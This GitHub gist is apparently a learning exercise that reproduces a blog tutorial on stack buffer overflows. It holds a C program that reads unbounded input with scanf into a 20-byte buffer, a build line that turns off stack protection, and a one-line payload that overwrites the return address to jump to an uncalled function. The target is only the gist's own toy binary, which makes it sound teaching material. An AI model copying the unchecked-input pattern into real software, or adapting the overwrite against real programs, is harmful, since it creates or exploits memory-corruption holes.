Skip to content

Instantly share code, notes, and snippets.

@CreaturePhil

CreaturePhil/endian.c

Last active August 19, 2017 04:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CreaturePhil/f3ffaa3204c670eff5ead3f13df2aede to your computer and use it in GitHub Desktop.
Save CreaturePhil/f3ffaa3204c670eff5ead3f13df2aede to your computer and use it in GitHub Desktop.
Download ZIP
buffer overflow exploit
Raw
endian.c
#include <stdio.h>
int main() {
int a = 0x12345678;
unsigned char *c = (unsigned char*)(&a);
if (*c == 0x78) {
printf("little-endian\n");
} else {
printf("big-endian\n");
}
return 0;
}
Raw
exploit.c
#include <stdio.h>
void secret_function()
{
printf("Congratulations!\n");
printf("You have entered in the secret function!\n");
}
void echo()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main(void)
{
echo();
return 0;
}
Raw
vuln.sh
gcc exploit.c -o vuln -fno-stack-protector
python -c 'print "a"*40 + "\xd6\x05\x40\x00\x00\x00\x00"' | ./vuln
# note "a" here can be any character. all it does is add padding of 32 length
@CreaturePhil
Copy link
Author

CreaturePhil commented Aug 19, 2017
edited

This is from https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/. Above snippets are for a 64 bit example.

Use endian.c to determine whether your computer is little or big endian. If it is different than change the order of the bytes in vuln.sh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment